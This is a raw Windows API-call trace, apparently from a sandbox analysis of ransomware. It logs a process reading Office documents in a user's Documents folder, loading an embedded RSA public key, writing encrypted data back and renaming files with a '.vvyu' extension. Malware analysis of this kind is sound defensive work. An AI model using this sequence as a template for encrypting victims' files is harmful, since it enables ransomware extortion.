dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0189.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0189.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2da0 | out: hHeap=0x2c0000) returned 1 [0189.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.569] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x14d94, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x14d94, lpOverlapped=0x0) returned 1 [0189.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.571] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14d99, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.571] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.573] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.573] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.573] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.574] CloseHandle (hObject=0x584) returned 1 [0189.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0189.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0189.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0189.576] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\WOYOdoVl_y_ELRl.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\woyodovl_y_elrl.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\WOYOdoVl_y_ELRl.ppt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\woyodovl_y_elrl.ppt.vvyu")) returned 1 [0189.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.588] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0189.591] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ab17870, ftCreationTime.dwHighDateTime=0x1d8733e, ftLastAccessTime.dwLowDateTime=0xfb5bdcf0, ftLastAccessTime.dwHighDateTime=0x1d874af, ftLastWriteTime.dwLowDateTime=0xfb5bdcf0, ftLastWriteTime.dwHighDateTime=0x1d874af, nFileSizeHigh=0x0, nFileSizeLow=0x15e7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wXPNYv.xlsx", cAlternateFileName="WXPNYV~1.XLS")) returned 1 [0189.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2da0 [0189.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2da0 | out: hHeap=0x2c0000) returned 1 [0189.592] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\wXPNYv.xlsx") returned=".xlsx" [0189.592] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\wXPNYv.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\wxpnyv.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.594] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=89725) returned 1 [0189.594] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.599] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15e57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.599] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.602] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.602] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x15e7d, lpOverlapped=0x0) returned 1 [0189.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.603] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.604] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.604] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.604] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.604] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.604] GetLastError () returned 0x0 [0189.604] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.604] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.605] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.605] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.605] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x15e80) returned 0x2af5168 [0189.606] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2da0 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db50 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2de8 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db68 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db98 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbf8 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbb0 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.606] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0189.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbf8 [0189.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0189.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbb0 [0189.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0db98 [0189.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0189.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0189.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0189.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.609] GetCurrentThreadId () returned 0x5d8 [0189.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4728 [0189.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.610] GetCurrentThreadId () returned 0x5d8 [0189.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0189.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0189.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbf8 [0189.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db98 [0189.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbb0 [0189.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db80 [0189.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc10 [0189.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0189.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbe0 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbc8 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc28 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbc8 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.614] 